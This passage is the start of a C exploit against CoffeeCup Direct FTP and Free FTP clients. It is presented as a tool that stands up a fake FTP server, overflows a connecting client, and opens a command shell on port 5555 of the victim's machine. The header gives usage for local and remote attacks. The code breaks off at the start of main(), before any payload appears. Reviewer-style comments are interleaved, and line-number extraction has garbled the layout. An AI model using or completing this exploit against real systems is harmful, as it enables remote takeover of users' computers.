1 /*************************************************************************************
2
3
CoffeeCup FTP Clients Buffer Overflow Vulnerability Exploit
4
created by Komrade
5
e-mail: unsecure(at)altervista(dot)org
6
web:
http://unsecure.altervista.org
7
8
Tested on:
9
CoffeeCup Direct FTP 6.2.0.62
10 CoffeeCup Free FTP 3.0.0.10
11
12 on a Windows XP Professional sp2 operating system.
13
14
This exploit creates a fake FTP server on your machine, waiting for the
15
connection of an FTP client.
16
After the exploit is sent, a shell (command prompt) is spawned on port 5555
17
of the target machine.
18
This exploit works locally or remotely.
19
20
Usage: coffeecupbof [direct | free] [−l] [−r server IP]
21
22
Options:
23
direct | free "direct" to exploit a CoffeeCup Direct FTP client
24
"free" to exploit a CoffeeCup Free FTP client
25
−l
executed locally
26
−r serverIP
executed remotely. You need to specify the address
27
of the FTP server for the PASV command (Insert your IP address)
28
29
Examples:
30
31
C:\> coffeecupbof direct −l
exploit for CoffeeCup Direct FTP executed locally
32
C:\> coffeecupbof free −r 10.0.0.1 exploit for CoffeeCup Free FTP executed remotely
33
34 *****************************************************************************************/
35
36 #include <stdio.h>
37 #include <string.h>
38 #include <windows.h>
39 #include <winsock.h>
40
/* Fixed ports for the fake FTP server described in the file header.
 * FTP_PORT is the standard FTP control port. PASV_PORT is presumably the
 * data port advertised in the PASV reply (the header ties the server
 * address option to the PASV command) -- confirm against fileList(),
 * which is not visible in this part of the file.
 * Defender note: both values are hard-coded, so together with the shell
 * port 5555 named in the header they can serve as network indicators for
 * this specific proof of concept. */
41 #define FTP_PORT 21
42 #define PASV_PORT 1106
43
/* File-scope state. `version` presumably records the "direct"/"free"
 * target choice from the command line -- TODO confirm in main().
 * `wait` starts out TRUE; its use is not visible here.
 * NOTE(review): neither variable is volatile or otherwise synchronized;
 * if fileList() runs on a second thread and touches them, confirm that
 * the access is safe. */
44 int version, wait = TRUE;
45
/* Forward declaration. The signature matches the Win32 thread-start
 * routine shape (DWORD WINAPI fn(LPVOID)); main() declares fileListH and
 * fileListId, so this is presumably launched with CreateThread --
 * confirm where it is started. */
46 DWORD WINAPI fileList(LPVOID data);
47
48 int main(int argc,char **argv){
49
50
SOCKET sock, client;
51
struct sockaddr_in sock_addr,client_addr;
52
WSADATA data;
53
WORD p;
54
char mess[4096], received[512], addr[32];
55
int lun, n, i, err;
56
HANDLE fileListH;
57
DWORD fileListId, exitCode;
58
59
p = MAKEWORD(2, 0);
60
WSAStartup(p, &data);
61
62
printf("−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\r\n");
63
printf("\tCoff